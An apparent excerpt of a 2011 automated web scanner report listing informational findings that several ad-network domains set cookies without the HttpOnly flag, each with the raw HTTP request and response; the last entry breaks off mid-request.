GET /click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1
Set-Cookie: id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 26 Apr 2011 18:45:00 GMT
Server: GFE/2.0
Content-Type: text/html


14.35. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_1yvt=jxb%3Aafuq%3A1; rth=2-ljzkpb-jxb~afuq~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:45:53 GMT
Connection: close
Set-Cookie: T_1yvt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_57k0=jxb%3Aagz6%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:45:53 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~agz6~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:45:53 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

14.36. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9j36=jxb%3Aaftr%3A1; rth=2-ljzkpb-jxb~aftr~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:35:58 GMT
Connection: close
Set-Cookie: T_9j36=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4xj=jxb%3Aagin%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:35:58 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~agin~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:35:58 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

14.37. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6mee=jxb%3Aaf0m%3A1; T_47z9=jxb%3Aaf0m%3A1; rth=2-ljzkpb-jxb~af0m~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:35:51 GMT
Connection: close
Set-Cookie: T_6mee=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_47z9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ai3m=jxb%3Aagig%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:35:51 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~agig~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:35:51 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

14.38. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_2o6=jxb%3Aag84%3A1; rth=2-ljzkpb-jxb~ag84~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 23:13:29 GMT
Connection: close
Set-Cookie: T_2o6=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7oga=jxb%3Aant7%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 23:13:30 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~ant7~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 23:13:30 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

14.39. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_eel0=eo7%3A861h%3A1; rth=2-ljzkpb-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:03:22 GMT
Connection: close
Set-Cookie: T_eel0=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_irnh=jxb%3Aaf0c%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:23 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~af0c~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:23 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

14.40. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_fk5h=jxb%3Aaf0c%3A1; rth=2-ljzkpb-jxb~af0c~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:03:33 GMT
Connection: close
Set-Cookie: T_fk5h=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_47z9=jxb%3Aaf0m%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:33 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~af0m~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:33 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

14.41. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_fk5h=jxb%3Aaf0c%3A1; rth=2-ljzkpb-jxb~af0c~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:03:32 GMT
Connection: close
Set-Cookie: T_fk5h=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_23jg=jxb%3Aaf0m%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:33 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~af0m~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:33 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

14.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/185076156  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/185076156

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/185076156 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L|23:257:656:6:0:44608:1303389829:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:35:32 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:35:32 GMT; path=/
Set-Cookie: i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L; expires=Thu, 26-May-2011 18:35:32 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 42

GIF89a.............!.......,...........L.;

14.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.835.tk.TEXT/422725724  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.835.tk.TEXT/422725724

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.835.tk.TEXT/422725724 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/market-news/default.aspx?feat=2f32cfe1-809c-4c94-91ed-3e58746880aa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:16 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:36:16 GMT; path=/
Set-Cookie: i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:36:16 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 42

GIF89a.............!.......,...........L.;

14.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:36:15 GMT; path=/
Set-Cookie: i_1=33:1411:790:100:0:40771:1303842975:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:36:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 886

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b
...[SNIP]...

14.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:36:15 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303842975:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:36:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 889

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d
...[SNIP]...

14.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:40:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:40:38 GMT; path=/
Set-Cookie: i_1=33:353:516:141:0:45000:1303843238:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:40:38 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 824

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7
...[SNIP]...

14.47. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1147351&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1620481;type=tdame177;cat=conte520;ord=1;num=6591672650538.385?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; lifb=o1s9XS8(?nv?!8H; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; 